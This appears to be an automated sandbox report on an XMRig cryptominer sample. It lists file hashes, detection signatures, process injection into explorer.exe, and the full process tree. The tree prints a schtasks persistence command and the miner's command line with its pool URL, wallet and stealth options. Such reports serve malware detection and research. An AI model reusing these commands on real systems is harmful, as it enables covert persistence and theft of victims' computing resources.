Analysis
- max time kernel: 137s
- max time network: 152s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 23-07-2021 19:07

Static task: static1
Behavioral task: behavioral1
Sample: eb9f90fdaf8f78ff76132098d17fd0bd.exe
Resource: win7v20210410
General
- Target: eb9f90fdaf8f78ff76132098d17fd0bd.exe
- Size: 45KB
- MD5: eb9f90fdaf8f78ff76132098d17fd0bd
- SHA1: 516bbca9d82ae9e8d35a5120cf16b95d87a8c35a
- SHA256: 479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204
- SHA512: fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource                                                                   yara_rule
behavioral2/memory/2388-137-0x0000000140000000-0x0000000140758000-memory.dmp  xmrig
behavioral2/memory/2388-138-0x00000001402EB66C-mapping.dmp                    xmrig
behavioral2/memory/2388-140-0x0000000140000000-0x0000000140758000-memory.dmp  xmrig
-
Executes dropped EXE 2 IoCs
Processes:
pid   process
2704  Services.exe
8     sihost64.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                           pid   process       target process
PID 2704 set thread context of 2388   2704  Services.exe  explorer.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid   process
2600  schtasks.exe
1544  schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid   process
1868  eb9f90fdaf8f78ff76132098d17fd0bd.exe
2704  Services.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description                    pid   process
Token: SeDebugPrivilege        1868  eb9f90fdaf8f78ff76132098d17fd0bd.exe
Token: SeDebugPrivilege        2704  Services.exe
Token: SeLockMemoryPrivilege   2388  explorer.exe
Token: SeLockMemoryPrivilege   2388  explorer.exe
-
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
description                         pid   process                                target process
PID 1868 wrote to memory of 3860    1868  eb9f90fdaf8f78ff76132098d17fd0bd.exe   cmd.exe
PID 1868 wrote to memory of 3860    1868  eb9f90fdaf8f78ff76132098d17fd0bd.exe   cmd.exe
PID 3860 wrote to memory of 2600    3860  cmd.exe                                schtasks.exe
PID 3860 wrote to memory of 2600    3860  cmd.exe                                schtasks.exe
PID 1868 wrote to memory of 2704    1868  eb9f90fdaf8f78ff76132098d17fd0bd.exe   Services.exe
PID 1868 wrote to memory of 2704    1868  eb9f90fdaf8f78ff76132098d17fd0bd.exe   Services.exe
PID 2704 wrote to memory of 2096    2704  Services.exe                           cmd.exe
PID 2704 wrote to memory of 2096    2704  Services.exe                           cmd.exe
PID 2704 wrote to memory of 8       2704  Services.exe                           sihost64.exe
PID 2704 wrote to memory of 8       2704  Services.exe                           sihost64.exe
PID 2096 wrote to memory of 1544    2096  cmd.exe                                schtasks.exe
PID 2096 wrote to memory of 1544    2096  cmd.exe                                schtasks.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
PID 2704 wrote to memory of 2388    2704  Services.exe                           explorer.exe
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
            - Creates scheduled task(s)

    [2] C:\Users\Admin\AppData\Local\Temp\Services.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Services.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\system32\schtasks.exe
                Command line: schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                - Creates scheduled task(s)

        [3] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE

        [3] C:\Windows\explorer.exe
            Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos --pass= --cpu-max-threads-hint=50 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Services.exe
  MD5    eb9f90fdaf8f78ff76132098d17fd0bd
  SHA1   516bbca9d82ae9e8d35a5120cf16b95d87a8c35a
  SHA256 479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204
  SHA512 fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5    8a967775b61469d620643ac7b8623551
  SHA1   07cce4043304be719aab5aafe75e7e966276cf1c
  SHA256 212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e
  SHA512 10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1
-
memory/8-132-0x0000000000370000-0x0000000000371000-memory.dmp (Filesize: 4KB)
-
memory/8-136-0x0000000002A20000-0x0000000002A22000-memory.dmp (Filesize: 8KB)
-
memory/8-129-0x0000000000000000-mapping.dmp
-
memory/1544-134-0x0000000000000000-mapping.dmp
-
memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmp (Filesize: 4KB)
-
memory/1868-120-0x0000000003740000-0x0000000003742000-memory.dmp (Filesize: 8KB)
-
memory/1868-117-0x00000000036F0000-0x00000000036F1000-memory.dmp (Filesize: 4KB)
-
memory/1868-116-0x0000000001590000-0x0000000001599000-memory.dmp (Filesize: 36KB)
-
memory/2096-128-0x0000000000000000-mapping.dmp
-
memory/2388-138-0x00000001402EB66C-mapping.dmp
-
memory/2388-137-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
-
memory/2388-139-0x0000000000C00000-0x0000000000C20000-memory.dmp (Filesize: 128KB)
-
memory/2388-140-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
-
memory/2388-143-0x0000000014150000-0x0000000014170000-memory.dmp (Filesize: 128KB)
-
memory/2388-144-0x0000000014600000-0x0000000014620000-memory.dmp (Filesize: 128KB)
-
memory/2388-146-0x0000000014370000-0x0000000014390000-memory.dmp (Filesize: 128KB)
-
memory/2388-145-0x0000000014390000-0x00000000143B0000-memory.dmp (Filesize: 128KB)
-
memory/2600-119-0x0000000000000000-mapping.dmp
-
memory/2704-121-0x0000000000000000-mapping.dmp
-
memory/2704-135-0x000000001CB02000-0x000000001CB03000-memory.dmp (Filesize: 4KB)
-
memory/3860-118-0x0000000000000000-mapping.dmp